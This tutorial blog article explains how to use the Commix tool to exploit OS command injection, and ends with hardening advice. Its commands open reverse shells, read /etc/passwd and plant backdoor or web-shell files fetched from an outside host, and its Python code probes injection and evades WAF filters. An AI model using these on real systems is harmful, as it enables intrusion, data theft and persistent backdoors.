
Commix: Practical Command Injection Exploitation Guide

Eng. Donya Bino Published  ·  4 min read

Commix (short for Command Injection eXploiter) is an open-source tool built specifically to automate the detection and exploitation of OS command injection vulnerabilities in web applications.

Unlike general-purpose scanners (Burp, ZAP) or sqlmap, which targets SQL injection, Commix focuses only on command injection: places where user input reaches a system command unsanitised. In PHP that means exec, passthru, system, shell_exec, popen, proc_open and friends; other stacks have the equivalent subprocess or child-process calls.

Current status: still actively maintained on GitHub. Because Commix works at the HTTP layer and exploits the operating-system shell behind the application, it does not care what the backend is written in: PHP, Python, Node.js, Ruby, Perl and Java applications are all testable as long as the injected input reaches a shell.

Installing Commix (Kali or other Linux; Termux)
# 1. Cloning the Git repository is the recommended method (you always get the latest release)
git clone https://github.com/commixproject/commix.git
cd commix
pip3 install --user -r requirements.txt
python3 commix.py --help

# 2. Kali Rolling ships a package (BlackArch does too, via pacman rather than apt)
sudo apt update && sudo apt install commix

Core Modes of Use and Example Implementations
1. Primary form of detection and exploitation (the most common use case)
Target: a web application with a command injection flaw in one of its parameters
python3 commix.py -u "http://target.com/ping.php?ip=127.0.0.1"

Commix will:
1. Try each injection technique in turn: classic (results-based), dynamic code evaluation, time-based blind, and file-based semi-blind.
2. Try the different separator and substitution forms a shell accepts: ;, &, |, &&, ||, %0a (newline), $( ), backticks, etc.
3. Fingerprint the target operating system and the web server.
4. If the parameter is injectable, open an interactive pseudo-shell (the commix(os_shell)> prompt); every command typed there is executed on the target through the injection point.
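To make the detection loop above concrete, here is an added example (it is not code from the article or from Commix itself) that probes a sink with the same separators Commix tries, first results-based and then time-based. The target is a constructed stand-in for ping.php called vulnerable_ping; it runs echo instead of ping so the whole thing works offline, and it assumes a POSIX /bin/sh.

```python
"""
Added example (not part of the original article or of Commix): a minimal
results-based and time-based command-injection probe, to show what a tool
like Commix does when it tries one separator after another.  Everything
runs locally: `vulnerable_ping` is a constructed stand-in for ping.php that
uses `echo` instead of `ping`; it is not a real target.  Assumes /bin/sh.
"""
import random
import subprocess
import time

# Separator / substitution forms a tester tries.  "%s" marks the forms that
# wrap the injected command instead of being placed between two commands.
SEPARATORS = [";", "&&", "|", "||", "&", "\n", "$(%s)", "`%s`"]


def vulnerable_ping(host: str) -> str:
    """Constructed vulnerable sink: user input concatenated into a shell string."""
    cmd = "echo pinging %s" % host          # a real app would run "ping -c 1 %s"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def build_payload(sep: str, command: str, base: str = "127.0.0.1") -> str:
    """Attach `command` to a benign base value using the given separator."""
    if "%s" in sep:                          # $(...) and `...` wrap the command
        return base + (sep % command)
    return base + sep + command


def classic_probe(sink, sep: str) -> bool:
    """Results-based check: inject `echo $((a*b))` and look for the product.
    Using arithmetic rather than a literal token avoids a false positive when
    the application merely reflects the submitted input back to us."""
    a, b = random.randint(100, 999), random.randint(100, 999)
    payload = build_payload(sep, "echo $((%d*%d))" % (a, b))
    try:
        output = sink(payload)
    except Exception:                        # a hardened sink may reject the input
        return False
    return str(a * b) in output


def time_based_probe(sink, sep: str, delay: int = 2) -> bool:
    """Blind check: inject `sleep N` and see whether the call takes N seconds."""
    payload = build_payload(sep, "sleep %d" % delay)
    start = time.monotonic()
    try:
        sink(payload)
    except Exception:
        return False
    return time.monotonic() - start >= delay


def find_injectable_separators(sink) -> list:
    """Return every separator for which the results-based probe succeeds."""
    return [sep for sep in SEPARATORS if classic_probe(sink, sep)]


if __name__ == "__main__":
    hits = find_injectable_separators(vulnerable_ping)
    print("injectable via:", [repr(s) for s in hits])
    print("time-based via ';':", time_based_probe(vulnerable_ping, ";", delay=1))
```

Run it and every separator except || shows up: `echo pinging 127.0.0.1 || echo ...` never executes the right-hand side because the left-hand echo succeeds, which is exactly why a tool cannot stop at the first separator it knows. The time-based probe is the fallback for blind sinks whose output is never returned to the client.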


2. POST request injection (very common in real apps)
python3 commix.py \
  --url="http://target.com/submit.php" \
  --data="name=test&email=test@example.com&cmd=ping" \
  --level=3
Every parameter in --data is tested. --level widens the scope: 1 (the default) tests GET/POST parameters, 2 adds cookie values, 3 adds HTTP headers such as User-Agent and Referer, at the cost of many more requests.

3. Target a specific parameter and speed things up
python3 commix.py \
  -u "http://target.com/vuln.php?host=*" \
  -p host \
  --os-cmd="whoami"
The asterisk marks the exact injection point, -p restricts testing to the named parameter (skipping every other one saves a lot of requests), and --os-cmd runs a single command through the injection and exits instead of opening the pseudo-shell.

4. Use custom cookie / headers (authenticated endpoints)
python3 commix.py \
  -u "http://target.com/admin/execute.php?cmd=*" \
  --cookie="PHPSESSID=abc123; admin=1" \
  --headers="X-Forwarded-For: 127.0.0.1"

5. Get a reverse shell (the classic goal)
After a successful detection Commix drops you into its pseudo-shell. Type reverse_tcp at the prompt and answer the questions that follow (listening host, listening port and which reverse-shell flavour Commix should use):
commix(os_shell)> reverse_tcp
Have the listener running before you do:
nc -lvnp 4444
Ordinary commands typed at the prompt (id, uname -a, ...) are executed through the injection point, so you can already enumerate the host before upgrading to a full shell.

6. File read / write / upload (very useful)
File operations are command-line options rather than pseudo-shell commands; run them against the same injectable URL:
python3 commix.py -u "http://target.com/ping.php?ip=127.0.0.1" --file-read=/etc/passwd
python3 commix.py -u "http://target.com/ping.php?ip=127.0.0.1" --file-write=./backdoor.php --dest=/tmp/backdoor.php
python3 commix.py -u "http://target.com/ping.php?ip=127.0.0.1" --file-upload=http://192.168.1.10/shell.php --dest=/var/www/html/shell.php
--file-write pushes the contents of a local file through the injection; --file-upload takes a URL and makes the target fetch the file itself (so the target needs outbound access to you); --dest is the destination path on the target, which the web server's user must be able to write to.

7. Advanced: tamper scripts and evasion
Commix ships tamper scripts (the same idea as sqlmap's) that rewrite each payload before it is sent, to slip past a WAF or an input filter:
python3 commix.py -u "http://target.com/vuln" --tamper=space2ifs,base64encode
python3 commix.py --list-tampers

Commonly used tamper scripts:
1. space2ifs (replaces spaces with ${IFS})
2. space2plus
3. base64encode
4. hexencode
5. randomcase
6. backslashes
7. uninitializedvariable
Note that sqlmap tampers such as space2comment or versionedkeywords rely on SQL comment syntax and have no shell equivalent. A tamper only helps when the rewrite it performs matches what the filter actually blocks, and the order in which you chain them matters, so look at the filter's behaviour before picking one.
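The following is an added example, not Commix's own tamper code: two tamper transformations written out in full, chained the way --tamper=a,b chains them, and checked against a constructed naive filter that blocks spaces and the string "cat". The transformations follow the idea behind the Commix scripts of the same names; their exact output is an assumption and may differ from what Commix emits. It assumes a POSIX /bin/sh and the GNU coreutils base64 -d.

```python
"""
Added example (not Commix's own tamper code): what space2ifs and
base64encode do to a payload, why chaining order matters, and a local
check that the tampered command still behaves like the original.
`naive_filter_blocks` is a constructed stand-in for a weak WAF rule.
Assumes /bin/sh and GNU coreutils `base64 -d`.
"""
import base64
import subprocess


def space2ifs(payload: str) -> str:
    """Replace every space with ${IFS}; the shell splits on it like a space."""
    return payload.replace(" ", "${IFS}")


def base64encode(payload: str) -> str:
    """Hide the command entirely: the target decodes it and pipes it into sh."""
    encoded = base64.b64encode(payload.encode()).decode()
    return "echo %s|base64 -d|sh" % encoded


TAMPERS = {"space2ifs": space2ifs, "base64encode": base64encode}


def apply_tampers(payload: str, names: str) -> str:
    """Apply comma-separated tampers left to right, as --tamper=a,b would."""
    for name in names.split(","):
        payload = TAMPERS[name.strip()](payload)
    return payload


def naive_filter_blocks(value: str) -> bool:
    """Constructed weak filter: rejects any space or the substring 'cat'."""
    return " " in value or "cat" in value.lower()


def run_in_sh(command: str) -> str:
    """Execute locally so the tampered payload can be compared with the original."""
    return subprocess.run(command, shell=True, capture_output=True, text=True).stdout


def verify_equivalent(payload: str, names: str) -> bool:
    """True when the tampered payload produces the same output as the original."""
    return run_in_sh(payload) == run_in_sh(apply_tampers(payload, names))


if __name__ == "__main__":
    payload = "echo concatenation works"      # blocked: has spaces and contains 'cat'
    for chain in ("space2ifs", "space2ifs,base64encode", "base64encode,space2ifs"):
        tampered = apply_tampers(payload, chain)
        print("%-25s blocked=%-5s same_output=%s  %s" % (
            chain, naive_filter_blocks(tampered), verify_equivalent(payload, chain), tampered))
```

Running it shows the order dependency: space2ifs,base64encode is still blocked, because base64encode wraps the already-encoded payload in `echo ...|base64 -d|sh` and that wrapper contains a fresh space; base64encode,space2ifs strips every space, including the wrapper's, and passes the filter while still printing the same output.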

Common vulnerable patterns found in real-world bug bounty and pentest work
1. Custom PHP ping or traceroute tools that concatenate the user-supplied host straight into a shell command.
2. Forgotten debug endpoints such as /ping.php?ip= and /exec.php?cmd=.
3. Log viewers that run tail or grep on user-controlled file names or search strings.
4. Backup or restore features that pass unsanitised paths to tar, zip or unzip.
5. Unsafe calls to child_process.exec() in Node.js and subprocess.call(..., shell=True) or os.system() in Python, with the command built as a string.

Quick protection list for developers and owners
1. Never pass unvalidated user input to a system command; better still, avoid spawning a shell at all and use a library call (for example a socket-based reachability check instead of shelling out to ping).
2. Use APIs that take an argument vector rather than a command string: Python subprocess.run([...], shell=False), PHP escapeshellarg() around every argument, Node execFile() instead of exec().
3. Validate and allowlist input before use: parse an IP address with a real parser, and for a hostname accept only a-z, 0-9, '.' and '-' and reject everything else.
4. Run the web application as a least-privilege user (never root), so a successful injection stays contained.
5. Put a WAF with command-injection signatures in front of the application (Cloudflare's free WAF, ModSecurity with the OWASP Core Rule Set) as defence in depth, not as the only control: tamper scripts exist precisely to get around signatures.
6. Test regularly with Commix, sqlmap and nuclei templates so that OS command injection is found before an attacker finds it.
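As an added example (not the article's or Commix's code), here is the ping handler from pattern 1 above written the vulnerable way and the hardened way, applying items 1 to 3 of the protection list: allowlist validation, an argument vector, and no shell. Both functions are constructed stand-ins that run echo instead of ping so they work offline; the hostname rules are assumptions based on the usual DNS label syntax.

```python
"""
Added example (not the article's or Commix's code): vulnerable and hardened
versions of a "ping this host" handler.  Constructed stand-ins: `echo`
replaces `ping` so the code runs offline.  Assumes /bin/sh and /bin/echo.
"""
import ipaddress
import re
import subprocess

# Assumed hostname rule: DNS labels of letters, digits and hyphens, no leading
# or trailing hyphen, joined by dots.  Rejecting a leading '-' also blocks
# option injection (a "host" of "-c" would otherwise be parsed as a flag).
LABEL = r"[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?"
HOSTNAME_RE = re.compile(r"^%s(?:\.%s)*$" % (LABEL, LABEL))


def is_safe_host(value: str) -> bool:
    """Allowlist validation: a parseable IP address or a plain DNS hostname."""
    try:
        ipaddress.ip_address(value)          # covers IPv4 and IPv6 literals
        return True
    except ValueError:
        pass
    return len(value) <= 253 and HOSTNAME_RE.match(value.lower()) is not None


def vulnerable_ping(host: str) -> str:
    """String-built command plus shell=True: the injection point Commix hunts for."""
    return subprocess.run("echo pinging " + host, shell=True,
                          capture_output=True, text=True).stdout


def hardened_ping(host: str) -> str:
    """1) validate against the allowlist, 2) pass an argv list, 3) no shell."""
    if not is_safe_host(host):
        raise ValueError("invalid host: %r" % host)
    result = subprocess.run(["echo", "pinging", host],   # ["ping", "-c", "1", host] for real
                            capture_output=True, text=True, timeout=5)
    return result.stdout


def try_both(host: str) -> tuple:
    """Return (vulnerable output, hardened output or the rejection message)."""
    try:
        hardened = hardened_ping(host)
    except ValueError as exc:
        hardened = "rejected: %s" % exc
    return vulnerable_ping(host), hardened


if __name__ == "__main__":
    for candidate in ("127.0.0.1", "example.com", "127.0.0.1;echo $((6*7))", "$(id)", "-c"):
        vuln, safe = try_both(candidate)
        print("%-28r vulnerable=%-26r hardened=%r" % (candidate, vuln, safe))
```

Even without the allowlist, the argv form never interprets ; or $( ), so the injected text would simply become part of one argument; the allowlist is still needed to keep a value like -c from being read as an option by the real ping binary.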

The main benefit of using Commix to test for OS command injection is focus: it is quicker because it looks for only this vulnerability class, and it handles authenticated endpoints, blind and time-based injection, and post-exploitation (file read/write, reverse shells) out of the box. sqlmap is the wrong tool for this sink: its OS-shell features ride on a SQL injection, so when the vulnerable call is a shell command rather than a database query, Commix is the one to reach for.

Commix should only be used for ethical hacking on systems that the user owns or when explicit written consent has been given to test the target.


© 2016 – 2026 Red Secure Tech Ltd. Registered in England and Wales — Company No: 15581067